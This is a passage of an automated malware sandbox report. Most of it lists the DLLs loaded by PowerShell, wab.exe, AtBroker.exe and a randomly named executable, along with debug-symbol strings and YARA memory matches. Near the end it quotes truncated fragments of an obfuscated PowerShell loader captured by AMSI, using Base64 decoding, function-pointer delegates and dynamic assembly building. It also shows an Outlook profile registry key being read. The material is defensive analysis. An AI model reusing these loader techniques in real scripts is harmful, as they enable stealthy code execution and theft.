        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: System.Configuration.Install.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Data.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 0000000A.00000002.20243445512.000000006A10D000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: indows\System.Core.pdbRm source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C58000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.DirectoryServices.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
        Source: Binary string: System.Data.ni.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl@ source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
        Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
        Source: Binary string: System.DirectoryServices.ni.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
        Source: Binary string: System.Management.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: System.Management.ni.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Configuration.Install.ni.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
        Source: Binary string: System.Numerics.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 0000000A.00000002.20097370457.000000000AFA5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.20097330358.00000000090A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Gulix)$global:Gardenpartiene = [System.Text.Encoding]::ASCII.GetString($Thoracostracan)$global:Fdevareindustriens=$Gardenpartiene.substring(298872,26118)<#Dhobee Lsningsforsget Sekti
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Perflation $Reintervention $Guldfatning), (Overcredit @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ablastin = [AppDomain]::CurrentDomain.GetAssemblies()
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tilsynsvrger)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Drikkelserne, $false).DefineType($caters, $R
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Gulix)$global:Gardenpartiene = [System.Text.Encoding]::ASCII.GetString($Thoracostracan)$global:Fdevareindustriens=$Gardenpartiene.substring(298872,26118)<#Dhobee Lsningsforsget Sekti
